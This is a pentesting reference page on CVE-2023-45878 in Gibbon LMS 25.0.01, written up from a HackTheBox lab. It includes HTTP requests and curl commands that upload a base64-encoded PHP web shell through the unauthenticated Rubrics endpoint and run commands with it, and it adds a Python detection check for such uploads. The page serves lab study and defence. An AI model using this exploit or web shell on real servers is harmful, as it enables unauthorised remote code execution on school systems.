
Pentesting Gibbon LMS

Gibbon Edu is open-source educational software designed for schools and institutions to manage their administrative and academic processes. It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

Well known vulnerabilities

Version 25.0.01: unauthenticated arbitrary file upload leading to remote code execution

HackTheBox machine: The Frizz.

Source: https://herolab.usd.de/security-advisories/usd-2023-0025/

Advisory ID: usd-2023-0025
Product: Gibbon (https://gibbonedu.org/)
Affected Version: 25.0.01 (before commit '226d83568cf3d447c4d86d4e5aba2c6e6289045d')
Vulnerability Type: CWE-434: Arbitrary File Write
Security Risk: Critical
Vendor URL: https://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2023-45878
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-45878

Description: Unauthenticated attackers can upload arbitrary files to the application and receive code execution on the underlying system. To receive RCE an attacker must craft a fake image which can be stored as a PHP file.

POC (from HackTheBox machine The Frizz):

The Rubrics module has a file rubrics_visualise_saveAjax.php (source) which can be accessed without being authenticated. The file accepts img, path and gibbonPersonID as POST parameters. The payload in img must be base64-encoded and separated from the preceding type prefix by the ; and , characters.

Upload:

POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1
Host: frizzdc.frizz.htb
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K&path=lala.php&gibbonPersonID=0000000001

Trigger:

GET /Gibbon-LMS/lala.php?cmd=whoami HTTP/1.1
Host: frizzdc.frizz.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: G60fa1cd0af7be78b=kf7gpbsht6raqise6sogin25uq
Upgrade-Insecure-Requests: 1

With curl:

Upload:

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=lele.php" \
--data-urlencode "gibbonPersonID=0000000001"
lele.php      

Trigger:

curl "http://frizzdc.frizz.htb/Gibbon-LMS/lele.php?cmd=whoami"
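
Detection side, as an added example (not code from the original page, the advisory or Gibbon): a check for captured POST bodies sent to the Rubrics endpoint, for instance from a reverse proxy or WAF that logs request bodies. It parses img and path in the format described above and flags uploads whose decoded content or target filename is not an image. The function name inspect_upload, the .png-only policy and the benign sample body are assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlencode

ENDPOINT = "/modules/Rubrics/rubrics_visualise_saveAjax.php"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def inspect_upload(request_path, body):
    """Return findings for one captured POST; an empty list means nothing flagged."""
    if not request_path.endswith(ENDPOINT):
        return []
    form = parse_qs(body, keep_blank_values=True, separator="&")
    img = form.get("img", [""])[0]
    path = form.get("path", [""])[0]
    findings = []
    # Assumed policy: the endpoint should only ever store a PNG in the web
    # root, so another extension or a directory component is suspicious.
    if not path.lower().endswith(".png"):
        findings.append("path is not a .png filename")
    if "/" in path or "\\" in path:
        findings.append("path contains a directory separator")
    # img has the form "<type>;<label>,<base64>"; keep what follows the comma.
    # A raw "+" in a form body decodes to a space, so restore it first.
    b64 = img.partition(",")[2].replace(" ", "+")
    try:
        data = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return findings + ["img payload is not valid base64"]
    if not data.startswith(PNG_MAGIC):
        findings.append("decoded payload lacks the PNG signature")
    if b"<?" in data:  # heuristic: PHP open tag inside the "image"
        findings.append("decoded payload contains a PHP open tag")
    return findings

# Body of the upload request shown on this page.
PAGE_BODY = ("img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K"
             "&path=lala.php&gibbonPersonID=0000000001")
# Constructed benign body: PNG signature plus padding bytes, .png filename.
BENIGN_BODY = urlencode({
    "img": "image/png;base64," + base64.b64encode(PNG_MAGIC + b"\x00" * 8).decode(),
    "path": "rubric.png",
    "gibbonPersonID": "0000000001",
})

if __name__ == "__main__":
    for name, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(name, inspect_upload("/Gibbon-LMS" + ENDPOINT, body))
```

Independently of this check, any POST to this endpoint from a client without a valid session is worth alerting on for instances still running an affected version.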
Last update: 2025-09-03
Created: September 3, 2025 20:21:24